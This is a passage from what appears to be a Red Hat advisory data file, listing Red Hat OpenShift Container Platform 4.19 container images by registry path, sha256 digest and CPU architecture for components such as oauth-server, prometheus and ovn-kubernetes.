"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
